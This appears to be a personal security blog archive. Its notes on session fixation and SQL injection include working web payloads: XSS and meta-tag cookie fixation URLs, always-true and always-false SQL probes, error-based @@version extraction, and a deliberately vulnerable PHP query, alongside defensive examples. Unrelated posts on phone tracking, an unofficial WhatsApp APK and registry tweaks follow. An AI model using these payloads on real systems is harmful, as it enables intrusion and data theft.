Session fixation : Attacker attacks the user’s browser before he logs in to the target server.
Session hijacking : Attacker attacks the user’s browser after he logs in to the target server.

Impact Duration
Session fixation : Attacker gains one-time, temporary or long-term access to the user’s session(s).
Session hijacking : Attacker usually gains one-time access to the user’s session and has to repeat the attack in order to gain access to another one.

Session Maintenance
Session fixation : Can require the attacker to maintain the trap session until the user logs into it.
Session hijacking : Requires no session maintenance.

Attack Vectors
Session fixation
1. Tricking the user to log in through a malicious hyperlink or a malicious login form
2. Exploiting a cross-site scripting vulnerability on any web server in the target server’s domain
3. Exploiting a meta tag injection vulnerability on any web server in the target server’s domain
4. Exploiting the “session adoption” feature of some web servers
5. Breaking into any host in the target server’s domain
6. Adding a domain cookie-issuing server to the target server’s domain in the user’s DNS server
7. Network traffic modification

Session hijacking
1. Exploiting a cross-site scripting vulnerability on the target server
2. Obtaining the session ID in the HTTP Referer header sent to another web server
3. Network traffic sniffing (only works with an unencrypted link to the target server)

Attack Target Area
Session fixation : Communication link, target web server, all hosts in target server’s domain, user’s DNS server
Session hijacking : Communication link, target web server


Mitigation
===============
1) HttpOnly flag on the session cookie (keeps it away from document.cookie)
2) Secure flag when HTTPS is in use (the cookie is never sent in clear)
3) Encrypted communication (TLS) between the user's browser and the target web server
4) Ensure that sessions expire within a reasonable period of time and are invalidated on logout
5) Issue a fresh session ID on login and never accept a session ID the client made up (no session adoption)

Broken Authentication and Session Management Cases
=====================================================
Case 1:
Plain text storage of passwords
Storing a password in plaintext may result in a system compromise: whoever reads the database or a backup has every account. Passwords sent in plaintext have the same problem in transit, where an attacker can sniff the network with any sniffing tool (such as Wireshark).

Case 2:
Improper Authentication
The user claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.

Case 3:
Missing Encryption of Sensitive Data
The software/website does not encrypt sensitive or critical information before storage or transmission
The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys.
For example : Storage for credit card no. or pin, user info or password

Case 4:
Clear text Transmission of Sensitive Information
The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by an attacker.
Many communication channels can be "sniffed" by attackers during data transmission. For example, network traffic can often be sniffed by an attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers.

Case 5:
Session Fixation
Read above for session fixation

Case 6:
Insufficiently Protected Credentials
Login pages not using adequate measures to protect the username and password while they are in transit from the client to the server
Use TLS (HTTPS) for the login page and everything after it

Case 7:
Insufficient Session Expiration
"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."
The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a website from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser's back button to access web pages previously accessed by the victim.
> Set sessions/credentials expiration date

Case 8:
Unverified Password Change
When setting a new password for a user, the product does not require knowledge of the original password or using another form of authentication.
This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user (often combined with CSRF to make the victim's own browser submit the change).

Case 9:
Weak Password Recovery Mechanism for Forgotten Password
The software contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.
It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user's account.(May lead to Brute force attack)
This weakness may be that the security question is too easy to guess or find an answer to (e.g. because it is too common). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system's weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system. Weak password recovery schemes completely undermine a strong password


Exploitation With SessionId
================================
IMP : https://www.exploit-db.com/papers/15990/
=============

Exploit 1 : Session Fixation
A bank website transports session IDs from browser to server in a URL argument named sessionid.

The attacker, who in this case is also a legitimate user of the system, logs into the server and is issued session ID 1234. The attacker then sends the hyperlink
http://online.worldbank.dom/login.jsp?sessionid=1234 to the victim, trying to lure him into clicking on it. The victim clicks on the link, which opens the server's login page in his browser.
Note that upon the request for login.jsp?sessionid=1234, the web application has established that a session already exists for this user and a new one need not be created. Finally, the user provides his credentials to the login script and the server grants him access to his bank account. However, at this point, knowing the session ID, the attacker can also access the victim's account via account.jsp?sessionid=1234. Since the session was fixed before the user logged in, we say that the user logged into the attacker's session.

To fix the session ID in the victim's browser via a cookie, the attacker uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234";</script>.idc

For domain cookie fixation:
The attacker uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234;domain=.worldbank.dom";</script>.idc

Meta tag injection
====================
Issuing a cookie using the <META> tag with a Set-Cookie attribute:
<meta http-equiv=Set-Cookie content="sessionid=1234">

http://online.worldbank.dom/<meta%20http-equiv=Set-Cookie%20content="sessionid=1234;%20Expires=Friday,%201-Jan-2010%2000:00:00%20GMT">.idc

Exploit 2 : Network-based attack (man in the middle)
Sniffing the packets within the network going to and from the victim's computer.

The attacker can inject a small (invisible) image into any web server's response to the browser, for example while the user is reading Yahoo news. This image would originate from any web server in the .website.com domain. Upon requesting the image content, the browser would connect to that web server, and the attacker, intercepting the request, could send a fake response from the web server including a Set-Cookie header, thereby fixing the user's session.

Exploit 3 : Prediction
The attacker can predict the session ID if session IDs are not unique or are not random.
For example:
The session ID is 123456
session ID 2 is 123456789
session ID 3 is predictable, maybe 123456789101112
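Added example (mine, not from the exploit-db paper or these notes): a Python session store that defeats the three exploits above and the Insufficient Session Expiration case at the top of these notes. IDs come from the OS CSPRNG (prediction), an ID the server never issued is ignored and replaced (fixation via URL, script or META), the ID is rotated at login so a pre-login ID never becomes authenticated, and idle/absolute timeouts bound replay of a sniffed ID. The SessionStore class, handle_request, fixation_scenario and the timeout values are assumptions for the demo.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60          # seconds without a request before the session dies
ABSOLUTE_TIMEOUT = 8 * 3600     # hard cap on lifetime, even for an active session


class SessionStore:
    """Server-side session table keyed only by IDs the server itself generated."""

    def __init__(self, now=time.time):
        self.now = now                 # injectable clock so expiry can be tested
        self._sessions = {}            # sid -> {"user", "created", "last_seen"}

    def new_session(self):
        # 256 bits from the OS CSPRNG: IDs are neither sequential nor guessable.
        sid = secrets.token_urlsafe(32)
        t = self.now()
        self._sessions[sid] = {"user": None, "created": t, "last_seen": t}
        return sid

    def resolve(self, sid):
        """Return the live session for sid, or None if the server never issued it
        or it has timed out. A client-presented ID is never adopted as a session."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        t = self.now()
        if t - s["last_seen"] > IDLE_TIMEOUT or t - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        s["last_seen"] = t
        return s

    def login(self, sid, user):
        """Authenticate and rotate: the pre-login ID (which an attacker may know)
        is destroyed and a fresh ID carries the authenticated state."""
        self._sessions.pop(sid, None)
        new_sid = self.new_session()
        self._sessions[new_sid]["user"] = user
        return new_sid

    def logout(self, sid):
        self._sessions.pop(sid, None)


def handle_request(store, presented_sid):
    """Hypothetical request handler. Returns (sid to set in the cookie, session).
    A bogus ID such as sessionid=1234 from a fixation link is discarded and replaced."""
    session = store.resolve(presented_sid) if presented_sid else None
    if session is None:
        sid = store.new_session()
        return sid, store.resolve(sid)
    return presented_sid, session


def fixation_scenario(store):
    """Replay the bank walkthrough above against this store.
    Returns (ID rotated at login?, attacker's ID dead?, user on the victim's session)."""
    attacker_sid = store.new_session()                   # attacker is a legitimate user
    cookie_sid, _ = handle_request(store, attacker_sid)  # victim arrives carrying that ID
    victim_sid = store.login(cookie_sid, "victim")       # victim authenticates
    attacker_view = store.resolve(attacker_sid)          # attacker replays the fixed ID
    return (victim_sid != attacker_sid,
            attacker_view is None,
            store.resolve(victim_sid)["user"])


if __name__ == "__main__":
    print(fixation_scenario(SessionStore()))   # (True, True, 'victim')
```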

SQL injection Contd......

Tuesday, 5 June 2018


SQL injection must be tested in headers, cookies and parameters with a single quote ('). SQL injection is more important than XSS and is always found where SELECT, CREATE, UPDATE and DELETE queries run. We search for error-based entries: everything that deals with the database must be fuzzed with SQL injection and with the Burp scanner, and CRUD operations must not be missed out. Detection is more important, to find new areas of injection. JSON requests, where there is a key parameter, must not be ignored, as they are attached to the database and can be exploited.


SQLmap
If the injection is not exploitable, reduce the likelihood rating, but never the impact.

Remediation
Suggest generic remediation and technology-based remediation (.NET, PHP, J2EE).

The OWASP guide is the best reference; a Google search on this will find it.
Dynamic query
Dynamic SQL is a programming technique that enables you to build SQL statements dynamically at runtime. You can create more general-purpose, flexible applications by using dynamic SQL because the full text of a SQL statement may be unknown at compilation. For example, dynamic SQL lets you create a procedure that operates on a table whose name is not known until runtime.

Stored procedure, functions, persistent query
Prepared statement
Parameterized query (pre-compiled statement) IMP
A parameterized query (also known as a prepared statement) is a means of pre-compiling a SQL statement so that all you need to supply are the "parameters" (think "variables") that need to be inserted into the statement for it to be executed. It is commonly used as a means of preventing SQL injection attacks; the syntax differs between PHP, .NET and JSP.




SQL injection attack and defense notes



SQL injection vulnerabilities most commonly occur when the Web application developer does not ensure that values received from a Web form, cookie, input parameter, and so forth are validated or encoded before passing them to SQL queries that will be executed on a database server.

If an attacker can control the input that is sent to an SQL query and manipulate that input so that the data is interpreted as code instead of as data, he may be able to execute code on the back-end database.

Without a sound understanding of the underlying database that they are interacting with, or a thorough understanding and awareness of the potential security issues of the code that is being developed, application developers can often produce inherently insecure applications that are vulnerable to SQL injection.

Q: What is the impact of an SQL injection vulnerability?
A: This depends on many variables; however, potentially an attacker can manipulate data in the database, extract much more data than the application should allow, and possibly execute operating system commands on the database server

Q: Is SQL injection a new vulnerability?
A: No. SQL injection has probably existed since SQL databases were first connected to Web applications. However, it was brought to the attention of the public on Christmas Day 1998.

Q: Can Web sites be immune to SQL injection if they do not allow the quote character to be entered?
A: No. There is a myriad of ways to encode the quote character so that it is accepted as input, and some SQL injection vulnerabilities can be exploited without using it at all. Also, the quote character is not the only character that can be used to exploit SQL injection vulnerabilities; a number of characters are available to an attacker, such as the double pipe (||) and double quote (“), among others.

Q: My application is written in PHP/ASP/Perl/.NET/Java, etc. Is my chosen language immune?
A: No. Any programming language that does not validate input before passing it to a dynamically created SQL statement is potentially vulnerable; that is, unless it uses parameterized queries and bind variables.


Finding SQL Injection
=========================
The Web browser is a client acting as a front-end requesting data from the user and sending it to the remote server which will create SQL queries using the submitted data. Our main goal at this stage is to identify anomalies in the server response and determine whether they are generated by an SQL injection vulnerability.


Testing by Inference
There is one simple rule for identifying SQL injection vulnerabilities: trigger anomalies by sending unexpected data. This rule implies that:
* You identify all the data entry points on the Web application.
* You know what kind of request might trigger anomalies.
* You detect anomalies in the response from the server.

The two most common methods are GET and POST.
GET sends everything in the URL, for example:
GET /search.aspx?text=lcd%20monitors&cat=1&num=20 HTTP/1.1
This kind of request sends parameters within the URL in the following format:
?parameter1=value1&parameter2=value2&parameter3=value3...

POST is basically used when you fill in a form; the values are sent at the bottom of the request (in the body), for example:

POST /contact/index.asp HTTP/1.1

Content-Length: 129
first=John&last=Doe&email=john@doe.com&phone=555123456&title=Mr&country=US&comments=I%20would%20like%20to%20request%20information

Manipulating Parameters
For example, you have URLs such as:
http://www.victim.com/showproducts.php?category=bikes
http://www.victim.com/showproducts.php?category=cars
http://www.victim.com/showproducts.php?category=boats

The showproducts.php page receives a parameter called category. We don't have to type anything; we just click on a link and are redirected.

But if you change it to http://www.victim.com/showproducts.php?category=attacker

you get an SQL error.
In the preceding example, we sent a request to the server with a non-existent category name. The response from the server was as follows:
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproducts.php on line 34


Another interesting test you can conduct to identify vulnerabilities in Microsoft SQL Server and Oracle is to send the following two requests to the Web server:
http://www.victim.com/showproducts.php?category=bikes
http://www.victim.com/showproducts.php?category=bi'+'kes
The MySQL equivalent is:
http://www.victim.com/showproducts.php?category=bikes
http://www.victim.com/showproducts.php?category=bi' 'kes

If the result of both requests is the same, there is a high possibility that there is an SQL injection vulnerability.

SQL injection vulnerabilities occur for two reasons:
* Lack of user input sanitization
* Data and control structures mixed in the same transport channel

The resulting SQL error may be handled in one of the following ways:
* The SQL error is displayed on the page and is visible to the user from the Web browser.
* The SQL error is hidden in the source of the Web page for debugging purposes.
* Redirection to another page is used when an error is detected.
* An HTTP error code 500 (Internal Server Error) or HTTP redirection code 302 is returned.
* The application handles the error properly and simply shows no results, perhaps displaying a generic error page.


Commonly Displayed SQL Errors
===============================

Microsoft SQL Server Errors

Consider the following request:
http://www.victim.com/showproducts.aspx?category=attacker'
The error returned from the remote application will be similar to the following:
Server Error in '/' Application.
Unclosed quotation mark before the character string 'attacker;'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 'attacker;'.

Imagine you find a page called showproduct.aspx in the victim.com application. The script receives a parameter called id and displays a single product depending on the value of the id parameter:
http://www.victim.com/showproduct.aspx?id=2
When you change the value of the id parameter to something such as the following:
http://www.victim.com/showproduct.aspx?id=attacker
the application returns an error similar to this:
Server Error in '/' Application.
Invalid column name 'attacker'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Invalid column name 'attacker'.


Based on the error, you can assume that in the first instance the application creates an SQL statement such as this:
SELECT * FROM products WHERE idproduct=2
The preceding statement returns a result set with the product whose idproduct field equals 2. However, when you inject a non-numeric value, such as attacker, the resultant SQL statement sent to the database server has the following syntax:
SELECT * FROM products WHERE idproduct=attacker
The SQL server understands that if the value is not a number it must be a column name. In this case, the server looks for a column called attacker within the products table. However, there is no column named attacker, and therefore it returns an error.
There are some techniques that you can use to retrieve information embedded in the errors returned from the database. The first one generates an error converting a string to an integer:
http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/@@version;--
Application response:
Server Error in '/' Application.
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 – 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: ) ' to a column of data type int.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
The database reported an error, converting the result of @@version to an integer and displaying its contents. This technique abuses the type conversion functionality in SQL Server. We sent 0/@@version as part of our injected code. As a division operation needs to be executed between two numbers, the database tries to convert the result from the @@version function into a number. When the operation fails the database displays the content of the variable.
You can use this technique to display any variable in the database. The following example uses this technique to display the user variable:



MySQL Errors
A common configuration is formed by an Apache Web server running PHP on a Linux operating system, but you can find it in many other scenarios as well. The following error is usually an indication of a MySQL injection vulnerability:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproduct.php on line 8

In this example, the attacker injected a single quote in a GET parameter and the PHP page sent the SQL statement to the database. The following fragment of PHP code shows the vulnerability:
<?php
//Connect to the database
mysql_connect("[database]", "[user]", "[password]") or
//Error checking in case the database is not accessible
die("Could not connect: " . mysql_error());
//Select the database
mysql_select_db("[database_name]");
//Read the category straight from the GET request, without any validation
$category = $_GET["category"];
//Build the statement by string concatenation: the quote-enclosed value becomes
//part of the SQL text, which is the injection point the text describes
$sql = "SELECT * FROM products WHERE category='" . $category . "'";
//Execute the query; on failure the raw database error is echoed back to the user
$result = mysql_query($sql) or die("Error: " . mysql_error());
?>


When an application running the preceding code catches database errors and the SQL query fails, the returned HTML document will include the error returned by the database. If an attacker modifies a string parameter by adding a single quote the server will return
output similar to the following:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

The preceding output provides information regarding why the SQL query failed. If the
injectable parameter is not a string and therefore is not enclosed between single quotes, the
resultant output would be similar to this:
Error: Unknown column 'attacker' in 'where clause'



Oracle Errors

When tampering with the parameters of Java applications with an Oracle back-end
database you will often find the following error:
java.sql.SQLException: ORA-00933: SQL command not properly ended at
oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:180) at
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
The preceding error is very generic and means that you tried to execute a syntactically
incorrect SQL statement. Depending on the code running on the server you can find the
following error when injecting a single quote:
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not
properly terminated
In this error the Oracle database detects that a quoted string in the SQL statement is not
properly terminated, as Oracle requires that a string be terminated with a single quote. The
following error re-creates the same scenario in .NET environments:
Exception Details: System.Data.OleDb.OleDbException: One or more errors
occurred during processing of command.
ORA-00933: SQL command not properly ended
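Added example (not from the book or these notes): a small Python scanner that turns the error strings quoted in the SQL Server, MySQL and Oracle sections above into detection signatures and runs them over a constructed application error log, so a defender can see both that a back-end is leaking raw database errors and which requests triggered them. The log line format, the client addresses and the helper names are constructed for the demo.

```python
import re
from collections import Counter

# Signatures built from the database error messages quoted in the sections above.
DB_ERROR_SIGNATURES = {
    "mssql": [
        r"Unclosed quotation mark before the character string",
        r"Invalid column name '",
        r"Syntax error converting the \w+ value",
        r"System\.Data\.SqlClient\.SqlException",
    ],
    "mysql": [
        r"You have an error in your SQL syntax",
        r"Unknown column '[^']*' in 'where clause'",
        r"supplied argument is not a valid MySQL result resource",
    ],
    "oracle": [
        r"ORA-00933: SQL command not properly ended",
        r"ORA-01756: quoted string not properly terminated",
        r"java\.sql\.SQLException: ORA-\d{5}",
    ],
}
_COMPILED = [(db, re.compile(pat))
             for db, pats in DB_ERROR_SIGNATURES.items() for pat in pats]


def classify_db_error(text):
    """Return the back-end family whose error signature appears in text, or None."""
    for db, rx in _COMPILED:
        if rx.search(text):
            return db
    return None


# Constructed application error log; the format (timestamp level ip method path msg=...)
# is hypothetical and the addresses are documentation ranges.
SAMPLE_LOG = """\
2018-06-05 10:12:01 ERROR 203.0.113.7 GET /showproducts.aspx?category=attacker' msg=Unclosed quotation mark before the character string 'attacker;'.
2018-06-05 10:12:09 INFO 203.0.113.7 GET /showproducts.aspx?category=bikes msg=200 OK
2018-06-05 10:13:44 ERROR 198.51.100.9 GET /showproduct.php?id=attacker msg=Error: Unknown column 'attacker' in 'where clause'
2018-06-05 10:14:02 ERROR 198.51.100.9 GET /catalog.jsp?item=5' msg=java.sql.SQLException: ORA-01756: quoted string not properly terminated
2018-06-05 10:15:30 ERROR 192.0.2.44 POST /contact/index.asp msg=SmtpException: mail server unreachable
"""

_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<level>\w+) (?P<ip>\S+) (?P<method>\w+) (?P<path>\S+) msg=(?P<msg>.*)$")

# Characters the notes above use as probes; their presence in the request
# separates a likely injection test from an ordinary application bug.
_PROBE_CHARS = ("'", '"', "||", "--")


def scan_log(log_text):
    """Return one alert per log line whose message is a raw database error."""
    alerts = []
    for line in log_text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        db = classify_db_error(m["msg"])
        if db is None:
            continue
        alerts.append({
            "ip": m["ip"],
            "path": m["path"],
            "db": db,
            "probe_in_request": any(c in m["path"] for c in _PROBE_CHARS),
            "msg": m["msg"],
        })
    return alerts


def sources_by_alert_count(alerts):
    """Group alerts by client address, most active first."""
    return Counter(a["ip"] for a in alerts).most_common()


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f'{a["ip"]:>14} {a["db"]:<7} probe={a["probe_in_request"]!s:<5} {a["path"]}')
```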
The following example shows an error returned from a .NET application


SQL injection payload => bikes' or '1'='1  (to make the condition always true)


In this example, we injected SQL code that created a meaningful, correct query. If the application is vulnerable to SQL injection, the preceding query should return every row in the products table. This technique is very useful, as it introduces an always true condition. ' or '1'='1 is inserted inline with the current SQL statement and does not affect the other parts of the request. The complexity of the query doesn't particularly matter, as we can easily create a correct statement.

Another test to perform in this kind of situation is the injection of an always false statement.
For that we will send a value that generates no results; for example, bikes' AND '1'='2:
SELECT *
FROM products
WHERE category='bikes' AND '1'='2' /* always false -> returns no rows */
The preceding statement should return no results, as the last condition in the WHERE clause can never be met. However, keep in mind that things are not always as simple as shown in these examples, and don't be surprised if you inject an always false condition and the application returns results.

IMP =>
Parameter manipulation

Mitigation =>
Output encoding
validation
sanitization
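Added example (not from these notes): the dynamic query from the showproducts page beside its parameterized form, run against a constructed in-memory SQLite table, so the always-true, always-false and string-concatenation inference probes discussed above can be seen rewriting the concatenated statement while the bound parameter stays plain data. The products table and its three rows are constructed; SQLite spells concatenation as ||, where MySQL uses a space and SQL Server uses +.

```python
import sqlite3


def make_db():
    """Constructed sample products table in an in-memory SQLite database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (idproduct INTEGER, name TEXT, category TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        (1, "Road bike", "bikes"),
        (2, "Sedan", "cars"),
        (3, "Dinghy", "boats"),
    ])
    return con


def dynamic_query(con, category):
    """Dynamic SQL as in the vulnerable showproducts page: the parameter is
    concatenated into the statement text, so quotes in it change the statement."""
    sql = "SELECT name FROM products WHERE category='" + category + "'"
    return [row[0] for row in con.execute(sql)]


def parameterized_query(con, category):
    """Same query with a bound parameter: the value travels separately from the
    statement and is only ever compared as a string, never parsed as SQL."""
    sql = "SELECT name FROM products WHERE category=?"
    return [row[0] for row in con.execute(sql, (category,))]


def probe(run, con, category):
    """Run a query builder and report what the client observes:
    ("rows", [...]) or ("error", message) when the database rejects the statement."""
    try:
        return ("rows", run(con, category))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


# Inputs from the notes: a normal value, always true, always false, the
# string-concatenation inference test ('bi'||'kes' in SQLite) and the lone
# single quote that produces a syntax error.
PROBES = ["bikes", "bikes' or '1'='1", "bikes' AND '1'='2", "bi'||'kes", "attacker'"]


def compare(con):
    """Map each probe to (dynamic result, parameterized result)."""
    return {p: (probe(dynamic_query, con, p), probe(parameterized_query, con, p))
            for p in PROBES}


if __name__ == "__main__":
    for value, (dyn, param) in compare(make_db()).items():
        print(f"{value!r:>22}  dynamic={dyn}  parameterized={param}")
```

Under the dynamic form, bikes and bi'||'kes return the identical result set, which is exactly the inference signal described above; under the parameterized form only the literal string bikes matches.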


How to find STOLEN or LOST android phone

Wednesday, 13 August 2014

This blog post of mine will be liked and loved by all the people who love their ANDROID phones / tabs.

So what I am going to tell you is how to find or search for your lost or stolen mobile :)

A phone can be stolen, lost or misplaced anytime, anywhere and by anyone,
and sometimes no one is there to help you; people come just for sympathy:
"OH! It's so sad, your 40,000/- mobile is lost"
"OMG, how could you misplace your mobile in the shop"

And what we do is shed some tears, take help from the police or any computer engineers, and in response we get nothing and have to buy a small phone or a less valuable phone than the one we bought before :(

What is a mobile phone for us??

* A friend that helps us pass the time when we are bored
** A place where we keep our secrets
*** A place where we have many memories in text (SMS) or in pics (photos)
**** A helper when you are late coming home
***** Night talks and love sharing with wife or girlfriend
****** Keeps you in touch with all the people you want in your life, and much more

So all these things are made possible by the phone, so it must have a little security for care.

HERES' THE SECRET

Download an app called ANDROID LOST

Download or install app => Click on me :)


So after installing this app you need:
1) a Gmail account
2) to synchronize that Gmail account on your phone
3) you can also install it with the help of the Play Store present on your phone

Features of the ANDROID LOST app
When your phone is lost, here is what you can do with the help of this app:

* read messages
** read call history
*** raise an alarm
**** get the mobile's location
***** get the IMEI no.
****** get a photo from the rear and front camera
******* lock the phone, change the picture
******** delete everything you have in your data / SD card
********* make the phone silent or vibrate
and much more; you can read everything in detail over here: click on me :)

NOW WHAT DO YOU HAVE TO DO AFTER INSTALLING THIS APP??

After installing this:

* synchronize your phone with your Gmail ID
** go to the Android Lost website (or Click on me :)), sign in on the website and track your mobile; simple
Just 3 steps and you can trace your mobile phone.

Here is the Video tutorial :: How to use Android lost app

Click on me :)
Installing tutorial => Click on me :)
How to use it Detail Click on me :)

SO keep your phone SAFE.
Just one app helps you a lot, so there is no need to take help and find yourself asking "Now what do I do?"

Be Safe and be Ethical
Pprasoon Nigam
Security Expert

How to use two WhatsApp in one Android device

Thursday, 24 April 2014


How to use two WhatsApp on one Android phone

or

Use two WhatsApp without rooting up mobile phone 

Many of you are thinking: am I joking or kidding? Is it really true? If yes, then tell me how?

Why two WhatsApps?

* to make yourself different
** to keep some people away from your personal no.
*** to have a personal no. with a personal WhatsApp for your lover
**** just to show "yeah, I can do this, I have two WhatsApps"
****** the mobile is not rooted (no rooting is needed), so you keep your warranty and guarantee

Now, how to do it; that's the important part.

HERE'S THE SECRET


First of all, back up all your WhatsApp chats.

Steps

Go to Settings => then to Chat settings and click on the backup option.
After backing up your WhatsApp:

*** go to Settings => Apps and uninstall your WhatsApp

**** when you have uninstalled it, go to Storage => Phone storage and find the WhatsApp folder

Rename your WhatsApp folder to WhatsAppold.
** Once you have renamed it, install a new WhatsApp from the Play Store, open it up and put your new number (mobile number) in it, then continue and agree to all the terms; do all the stuff you do to register in WhatsApp, but remember, with your new phone no.

::: ** NOW HERE IS THE IMPORTANT PART: REGISTERING THE SECOND WHATSAPP NO.

Now go to Storage and into Phone storage
=>>> now rename your WhatsAppold folder to OGWhatsApp

  Rename "WhatsAppold => OGWhatsApp"

Now download the apk file named "OGWhatsApp"

to download OGWhatsApp => Click on me :)


** Now install OGWhatsApp with the help of the apk file I have given you and then register yourself with your previous no. (or the old no.), and here you go with two WhatsApps with two different numbers.



Summary

*.* WhatsApp has your new no. registered
*.*       OGWhatsApp has your old no. registered
*.*             if you want you can do it vice versa, but you will mess up your backup data

20 little tricks and hacks for all Windows O.S

Sunday, 28 April 2013



20 tricks and hacks for all Windows O.S
PC & laptop to make it run the way you want

Let's take you through the hidden tweaks in Windows.

Tweaking enables you to make Windows do interesting and useful things that it doesn't necessarily do directly out of the box.

Some tweaks are easier to action than others but all of them help you to customize your PC and make it run closer to the way you'd like.

HERES' THE SECRET

*. Remove programs from Open with…

You can remove unwanted programs that appear on the Open with… list when you're trying to open an unknown program.

In the Registry, browse to HKEY_CLASSES_ROOT\Applications and you'll see a list of programs installed on your PC as subkeys in the left-hand pane.

To remove an unwanted program from this list, select it and then right-click in the right-hand pane. Choose New > String Value, and name it "NoOpenWith".


**. Copy to folder

Add a "Copy to folder" option to the context menu so you can right-click a file to quickly copy it.

In Registry Editor, browse to HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenuHandlers, and create a new key called Copy to.

Change its (Default) value to "" and check it works.



***. Move to folder

You can also add a "Move to folder" option in this way.

From the same ContextMenuHandlers key as in tip 2, create a new key called "Move to" and change its (Default) value to "".

****. Quick folder Properties

To move quickly to a folder's Properties dialog, double-click it and hold down [Alt].


*****. Correct file sorting

By default, a file named 2.jpg is sorted after one called 20.jpg. Many people work around this by starting single digit numbers in file names with a leading zero, but you can change this behaviour by making a Registry edit.

Browse to the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer.

Then create a new DWORD value and name it "NoStrCmpLogical". Right-click and modify its value to "1".

V*. Change the mouse pointer in Vista and Windows 7

Right-click the desktop and choose Personalize > Mouse Pointers. Select the scheme you want to use from the drop-down list. You can modify individual pointers by selecting one in the current scheme and clicking Browse – then replace this with any static cursor file with the extension .CUR, or an animated cursor file, which will have the .ANI file extension.

You can also download sets of mouse pointers online. These are generally distributed in sets of .CUR or .ANI files, grouped together in a zip archive. Download the file, unzip it and then replace the pointers you want to with the new files as in the above tip. A good place to start looking is here.

You can also make your own cursor files by creating suitable bitmap images in a graphics program and saving them with the .CUR extension.


V**. Mouse pointers in XP

To change the mouse pointer scheme in Windows XP, open Control Panel and switch to Classic View. Double-click Mouse and choose the Pointer tab.

V***. Send To expansion

When you right-click a file or folder in Windows 7 and choose Send To, there's a limited number of options. But hold down [Shift] as you right-click and you'll open an expanded menu containing My Documents, Downloads and more useful locations.

V****. Edit your theme

Right-click anywhere on the desktop and choose Personalize > Theme. Select an option from the drop-down list to use an existing theme.

Alternatively, choose "Window Colour and Appearance", open the Classic Appearance dialog to select a classic scheme and modify fonts and colours. Click Advanced. Pick the item you want to modify and enter the new colour or font.

VV. Folder toolbar

This tweak enables you to turn any folder on your hard drive into a toolbar, similar to the Quick Launch toolbar that gives you quick and easy access to the folder's contents.

First, minimise all your open windows, then move the mouse pointer to the Taskbar and right-click it. Choose Toolbars > New Toolbar from the expanding menu, which will launch the New Toolbar dialog.

Now select the item you want to use as a toolbar. If necessary, browse through My Documents or My Computer to find the folder you want. Alternatively, you can click "Make new folder" to create a custom one with specific contents.

Click OK, and your new toolbar appears as a button on the Windows Taskbar, then click this to see an expanding menu of its contents. Sub-folders also become their own expanding menus, and you can then select a particular file to open it in its associated application.

VV*. Active windows

Press [Alt] + [Esc] to cycle through your active items in the order in which they were opened. Then press [Alt] + [Tab] to pick the window you want to work on.

VV**. Hanging time

By default, Windows waits for five seconds to allow time for any hung applications to be closed when you shut down your computer.

If you want to reduce this period of time slightly, you can change the length with a quick Registry edit, so browse to HKEY_CURRENT_USER\Control Panel\Desktop. In Vista, create a string entry called "HungAppTimeout" (if you use XP, it's already there).

Right-click this and choose Modify. The number is in milliseconds, so the default of 5000 equates to a wait of five seconds. If you're using Windows 7, you should avoid using this tweak, because it causes glitches.

VV***. Tweak performance

1. Best performance

Choose Start, right-click Computer and go to Properties > Advanced system settings. In Performance, click Settings > Visual Effects. Tick "Adjust for best performance". This removes most animations to improve PC performance.

2. Processor scheduling

